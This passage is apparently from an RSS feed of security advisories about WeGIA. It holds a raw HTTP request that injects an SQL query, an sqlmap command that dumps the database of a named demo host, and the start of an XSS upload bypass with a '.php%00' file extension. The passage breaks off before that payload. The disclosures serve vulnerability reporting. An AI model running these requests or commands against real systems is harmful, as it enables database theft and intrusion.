&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/html/socio/sistema/controller/query_geracao_auto.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: comfirewall.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS1.1.1733498717.8.0.1733498717.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=4rjacbjksvve2j7goo2ldqh98l
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 61
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: https://comfirewall.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://comfirewall.wegia.org:8000/WeGIA/html/socio/sistema/psocio_geracao.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Te: trailers
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;query=SELECT @@version_compile_os AS Sistema_Operacional;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-sql&amp;#34; data-lang=&amp;#34;sql&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;@@&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;version_compile_os&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;AS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sistema_Operacional&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57034/image.png&amp;#34;
	width=&amp;#34;1780&amp;#34;
	height=&amp;#34;429&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57034/image_hu_34c11f32ed2b11e5.png 480w, /p/cve-2024-57034/image_hu_c46263e9b2f8aae6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;414&amp;#34;
		data-flex-basis=&amp;#34;995px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/issues/825&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/825&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-57035</title>
        <link>https://www.cvehunters.com/p/cve-2024-57035/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-57035/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-57035-sql-injection-vulnerability-in-nextpage-parameter-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2024-57035: SQL Injection Vulnerability in &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57035&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57035&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the endpoint &amp;lt;code&amp;gt;/control.php&amp;lt;/code&amp;gt;, specifically in the parameter &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-57035-sql-injection-vulnerability-in-nextpage-parameter-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2024-57035: SQL Injection Vulnerability in &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57035&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57035&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the endpoint &amp;lt;code&amp;gt;/control.php&amp;lt;/code&amp;gt;, specifically in the parameter &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;. This vulnerability allows the execution of arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;using-sql-map&amp;#34;&amp;gt;Using SQL Map:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-console&amp;#34; data-lang=&amp;#34;console&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;go&amp;#34;&amp;gt;  sqlmap -u &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarUm&amp;amp;amp;nomeClasse=SaudeControle&amp;amp;amp;nextPage=../html/saude/profile_paciente.php?id_fichamedica=1&amp;amp;amp;id=1&amp;amp;#34; --dbms=mysql --cookie=&amp;amp;#34;_ga_F8DXBXLV8J=GS1.1.1733782455.11.1.1733782568.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=tc79og6t5lr33d4tjv7ct1o9pg&amp;amp;#34; --dump
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57035/image.png&amp;#34;
	width=&amp;#34;1900&amp;#34;
	height=&amp;#34;320&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57035/image_hu_1762f89f55dd8ef6.png 480w, /p/cve-2024-57035/image_hu_32bb595a5d705295.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;593&amp;#34;
		data-flex-basis=&amp;#34;1425px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;using-sqlmap-an-attacker-could-dump-the-entire-database-information-from-wegia&amp;#34;&amp;gt;Using sqlmap an attacker could dump the entire database information from WeGIA.
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57035/image-1.png&amp;#34;
	width=&amp;#34;647&amp;#34;
	height=&amp;#34;342&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57035/image-1_hu_1db1dfbf5b91e353.png 480w, /p/cve-2024-57035/image-1_hu_a7099c9fea5cbc8a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/issues/827&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/827&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22132</title>
        <link>https://www.cvehunters.com/p/cve-2025-22132/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22132/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22132-cross-site-scripting-xss-in-file-upload-field&amp;#34;&amp;gt;CVE-2025-22132: Cross-Site Scripting (XSS) in File Upload Field
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22132&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22132&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Cross-Site Scripting (XSS) vulnerability was identified in the file upload functionality of the following endpoint:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22132-cross-site-scripting-xss-in-file-upload-field&amp;#34;&amp;gt;CVE-2025-22132: Cross-Site Scripting (XSS) in File Upload Field
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22132&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22132&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Cross-Site Scripting (XSS) vulnerability was identified in the file upload functionality of the following endpoint:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After capturing the file upload request from /WeGIA/html/socio/sistema/controller/controla_xlsx.php, simply change the uploaded file type to &amp;lt;code&amp;gt;.php%00&amp;lt;/code&amp;gt;, insert the payload into the content and send the request.&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
